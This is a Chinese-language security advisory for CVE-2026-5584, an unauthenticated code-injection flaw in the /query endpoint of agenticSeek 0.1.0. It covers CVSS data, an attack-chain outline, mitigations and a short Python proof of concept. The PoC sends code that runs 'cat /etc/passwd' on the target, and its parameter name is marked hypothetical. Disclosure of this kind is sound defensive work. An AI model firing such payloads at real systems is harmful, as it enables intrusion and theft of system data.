CVE-2026-5584 Fosowl agenticSeek 代码注入漏洞

漏洞信息

漏洞编号

CVE-2026-5584

漏洞类型

代码注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Fosowl agenticSeek

漏洞概述

Fosowl agenticSeek 0.1.0版本存在严重的代码注入漏洞。该漏洞位于sources/tools/PyInterpreter.py文件的query端点中。攻击者无需认证即可远程利用该漏洞，通过操纵PyInterpreter.execute函数，执行恶意代码，导致系统机密性、完整性和可用性受损。目前厂商尚未对此漏洞作出回应。

技术细节

该漏洞的核心在于Fosowl agenticSeek 0.1.0版本中`sources/tools/PyInterpreter.py`文件的`query`端点处理用户输入时存在严重的逻辑缺陷。具体而言，`PyInterpreter.execute`函数直接接收外部输入并将其传递给代码执行环境，未实施任何有效的过滤、沙箱隔离或权限控制。攻击者利用CVSS向量AV:N/AC:L/PR:N/UI:N/S:U的特征，可以构造包含恶意Python指令的Payload，通过网络直接发送至目标服务器的特定端点。由于攻击无需用户交互且无需身份验证，利用门槛极低。一旦Payload被服务器接收并处理，攻击者即可在当前进程上下文中执行任意系统命令或Python脚本。这不仅可能导致敏感信息泄露（C:L），还允许攻击者篡改关键数据（I:L）或通过资源耗尽导致服务中断（A:L）。鉴于厂商尚未回应，该漏洞对暴露在互联网上的系统构成极高威胁。

攻击链分析

STEP 1

侦察

攻击者扫描网络，识别出运行Fosowl agenticSeek 0.1.0版本的目标服务器，并发现开放的query端点。

STEP 2

武器化

攻击者构造包含恶意Python代码的Payload，旨在通过PyInterpreter.execute函数执行系统命令或读取敏感文件。

STEP 3

投递

攻击者通过HTTP/HTTPS请求，将构造好的恶意Payload发送至目标服务器的query接口。

STEP 4

利用

服务器端PyInterpreter.execute函数未经过滤直接处理恶意输入，导致Python代码在服务器上下文中被执行。

STEP 5

影响

成功利用漏洞后，攻击者获取服务器部分控制权，可能导致数据泄露、数据篡改或服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_code_injection(target_url):
    """
    PoC for CVE-2026-5584: Code Injection in PyInterpreter.execute
    """
    # The endpoint vulnerable to injection
    endpoint = f"{target_url}/query"

    # Payload to execute arbitrary Python code
    # Example: Reading /etc/passwd or executing a shell command
    payload = {
        # Hypothetical parameter based on 'PyInterpreter' context
        "code": "__import__('os').system('cat /etc/passwd')"
    }

    try:
        print(f"[*] Sending payload to {endpoint}...")
        response = requests.post(endpoint, json=payload, timeout=10)

        if response.status_code == 200:
            print("[+] Payload sent successfully!")
            print("[+] Response:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target IP/Domain
    target = "http://127.0.0.1:8000"
    exploit_code_injection(target)

影响范围

Fosowl agenticSeek 0.1.0

防御指南

临时缓解措施

由于厂商尚未发布修复补丁，建议立即在网络边界防火墙或应用网关处阻断对/query路径的非授权访问。同时，检查并修改`sources/tools/PyInterpreter.py`源码，确保`execute`方法不直接执行未经验证的用户输入，或使用`ast.literal_eval`等安全替代方案。对于必须使用该功能的场景，应配置严格的操作系统级权限隔离（如Docker容器），以防容器逃逸。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5584
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5584
3 Details https://www.cvedetails.com/cve/CVE-2026-5584/
4 VulDB https://vuldb.com/cve/CVE-2026-5584
5 Link https://github.com/August829/CVEP/issues/29
6 Link https://vuldb.com/submit/784052
7 Link https://vuldb.com/vuln/355383
8 Link https://vuldb.com/vuln/355383/cti